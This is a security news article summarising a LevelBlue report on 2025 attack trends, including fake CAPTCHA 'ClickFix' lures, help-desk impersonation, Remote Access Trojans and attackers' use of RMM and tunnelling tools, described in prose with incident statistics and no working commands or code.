Exploring the emerging trends in cyber deception threats of 2025, from counterfeit CAPTCHAs to Remote Access Trojans (RATs).

Cybercriminals are becoming increasingly adept at deception, as highlighted in a recent LevelBlue report. Attackers are utilising social engineering techniques and legitimate tools to navigate through environments undetected. The report reveals a significant increase in the number of customers affected by security incidents, which nearly tripled from 6 per cent in late 2024 to 17 per cent in early 2025. More than half of these incidents originated at the initial access stage. Once attackers gained entry, they acted swiftly, with the average time between compromise and lateral movement dropping below 60 minutes, and in some instances, taking less than 15 minutes. This rapid movement is facilitated by the continued use of familiar tools, such as Remote Desktop Protocol, which remains the most common method for transitioning between systems. Remote Monitoring and Management software is also widely employed to maintain access, with many cases showing multiple RMM tools installed on the same host. Tunnelling utilities further assist attackers in evading firewalls and concealing their activities.

Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, noted a striking development in the sophistication of threat actors’ deceptive tactics in the first half of 2025. They are moving beyond traditional Business Email Compromise schemes and employing targeted social engineering to manipulate users into granting access. Once inside, attackers deploy Remote Access Trojans and quickly erase their tracks, enabling them to traverse networks with alarming speed. This trend is expected to persist throughout 2026. Additionally, there has been a decline in incidents related to Business Email Compromise, which still accounts for the largest share of initial access at 57 per cent, down from 74 per cent in the previous reporting period. This shift correlates with a sharp rise in fake CAPTCHA scams and help desk impersonation, with social engineering now constituting 39 per cent of initial access methods, nearly tripling since late 2024. The ClickFix campaign is frequently cited, where users are deceived into executing a line of code in the Windows Run box, mistakenly believing it to be a routine CAPTCHA or security prompt. Instead of verification, this action launches a PowerShell command that connects to an external server and downloads malware, often in the form of Remote Access Trojans like NetSupport, Quasar, or Lumma Stealer. ClickFix-related activity surged by more than 1,400 per cent in just six months. Once attackers infiltrate a system, they rely on a combination of RMM tools and tunnelling to sustain access, using tools like Plink and Ngrok to create hidden connections that blend seamlessly with normal IT operations, making detection by defenders increasingly challenging.

A campaign utilizing artificial intelligence has created 15,000 counterfeit TikTok Shop websites that distribute malware and steal cryptocurrency.

Leaked Credentials Increase by 160%: Exploits Utilized by Attackers

HeartCrypt’s EDR Killer Tools called ‘AVKiller’ are currently being utilized in ransomware attacks.

Similar Posts